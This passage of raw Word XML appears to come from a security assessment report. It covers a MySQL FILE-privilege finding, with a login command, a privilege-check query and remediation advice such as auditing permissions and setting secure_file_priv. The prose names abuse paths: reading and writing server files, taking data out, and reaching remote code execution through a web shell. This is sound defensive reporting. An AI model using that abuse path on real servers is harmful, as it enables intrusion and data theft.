              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1005</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Data from Local System</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3E88E809">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1C2EABE"/>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E57EAD1" w14:textId="1D6D1C5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68AF24E" w14:textId="06A7393F">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R0411f4cdb44a41ea">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1038</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Execution Prevention</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2D1B66C3" w14:textId="43348C84">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R398a06ff53f9464f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">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466BED1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CD97B0" w14:textId="2BEB1093">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9898EA6" w14:textId="563C0AA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6754F6B0" w14:textId="08100F85"/>
    <w:p w:rsidR="1B8936BF" w:rsidP="0D325B6E" w:rsidRDefault="1B8936BF" w14:paraId="1349F356" w14:textId="10E27B45">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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7AC34EC" w:rsidP="0D325B6E" w:rsidRDefault="57AC34EC" w14:paraId="30ABB4F2" w14:textId="109E43C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7AC34EC">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57AC34EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL user</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="57AC34EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the FILE permission enabled</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an attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5E0173B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to read</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write to</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 files on the server. An attacker could potentially </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 this to achieve remote code executio</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n (RCE) th</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rough a web shell or </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writing to</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25723951">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> another file that gets executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7CACD96A" w14:textId="7427183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B8936BF" w:rsidP="0D325B6E" w:rsidRDefault="1B8936BF" w14:paraId="32F045E7" w14:textId="44E61ADE">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B8936BF" w:rsidP="0D325B6E" w:rsidRDefault="1B8936BF" w14:paraId="078964E5" w14:textId="38C49DD5">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w:t>
      </w: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 xml:space="preserve"> this vulnerability to exfiltrate confidential data stored in files from the machine, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11D1F690">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite important files, </w:t>
      </w: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 xml:space="preserve">as well as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2FCD1AEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">potentially achieve remote code execution on the server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="047F1FBC" w14:textId="15790EB9">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B8936BF" w:rsidP="0D325B6E" w:rsidRDefault="1B8936BF" w14:paraId="3FC7DA56" w14:textId="3E616A1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B8936BF" w:rsidP="0D325B6E" w:rsidRDefault="1B8936BF" w14:paraId="2DBB6BC7" w14:textId="4DEA38D4">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674B21D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Login to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C4F4725">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="674B21D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39CA4C86" w:rsidP="0D325B6E" w:rsidRDefault="39CA4C86" w14:paraId="1DD7F2D3" w14:textId="2AFFF9EB">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CA4C86">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Code block: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="39CA4C86">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="39CA4C86">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> –u root –p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="674B21D5" w:rsidP="0D325B6E" w:rsidRDefault="674B21D5" w14:paraId="47759F1F" w14:textId="6BC3B847">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74B21D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51DCC664">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Obseve</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51DCC664">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the FILE </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51DCC664">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>permission bei</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51DCC664">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ng ena</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51DCC664">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bled when running the following co</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51DCC664">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mmand:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="674B21D5" w:rsidP="0D325B6E" w:rsidRDefault="674B21D5" w14:paraId="30735871" w14:textId="0B100FD1">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74B21D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT grantee, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="674B21D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privilege_type</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="674B21D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="674B21D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>information_schema.user_privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="674B21D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE grantee = “</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="674B21D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>currentuser</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="674B21D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="52E0C577" w14:textId="6BF8EAD4">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B8936BF" w:rsidP="0D325B6E" w:rsidRDefault="1B8936BF" w14:paraId="1183532D" w14:textId="1E70858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B8936BF" w:rsidP="0D325B6E" w:rsidRDefault="1B8936BF" w14:paraId="429E428E" w14:textId="65D6CEE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B8936B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04A4FCE" w:rsidP="0D325B6E" w:rsidRDefault="404A4FCE" w14:paraId="2F71C334" w14:textId="0E42CC0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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04A4FCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit user permissions and disable </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25378542">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">any unnecessary permissions, to prevent low privileged users from </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25378542">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>having access to run arbitrary commands on the backend server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0B491403" w:rsidP="0D325B6E" w:rsidRDefault="0B491403" w14:paraId="3E7D0D6F" w14:textId="56ECE3B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>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B491403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If FILE permission is </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0B491403">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0B491403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, make sure </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0B491403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secure_file_priv</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0B491403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is set t</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 xml:space="preserve">o restrict what </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3BCEA0DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>files</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4EFA805">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 xml:space="preserve">QL </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ser</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6BE18210">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can read and write to</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6E73FA70">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32E6D02C" w14:textId="6C7056B5">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B8936BF" w:rsidP="0D325B6E" w:rsidRDefault="1B8936BF" w14:paraId="6A8B8EF5" w14:textId="5880E2A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936BF">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148F32C6" w:rsidP="0D325B6E" w:rsidRDefault="148F32C6" w14:paraId="03288167" w14:textId="0EE4B65C">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cf12a86652bc4df3">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="148F32C6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">MySQL </w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4C27D9AA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>- Privileges D</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="148F32C6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ocumentation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="30E1FD77" w14:textId="749FE2F3">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52B6EFCD" w14:textId="000FE016">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6F1023F4" w14:textId="6B224B8A">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4B70AF4B" w14:textId="4C72FA3A">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30694CD" w14:textId="6FC495D1">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1B86D12B" w14:textId="4FFED753">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F573306" w14:textId="302EDE17">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F533355" w14:textId="16D4EF92">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6044345" w14:textId="24C21587">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0AEEAF0A" w14:textId="6964E3E8">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2C9653AF" w14:textId="59C234A4">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038764E5" w14:textId="34C7FD3A">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D1695DB" w14:textId="56971238">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54662D92" w14:textId="664E0392">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19C0CDA1" w14:textId="378765D3">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1E589998" w14:textId="4E287E2A">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43BDE519" w14:textId="7DE85A8F">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426EDF4C" w14:textId="6B2B852F">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72D88BE5" w14:textId="7E8CF27B">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069EE616" w14:textId="498950FF">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3B8C0604" w14:textId="70363378">
      <w:pPr>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162F44E3" w14:textId="52453DAE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3D0998D0" w14:textId="0CF4A97E">
      <w:pPr>
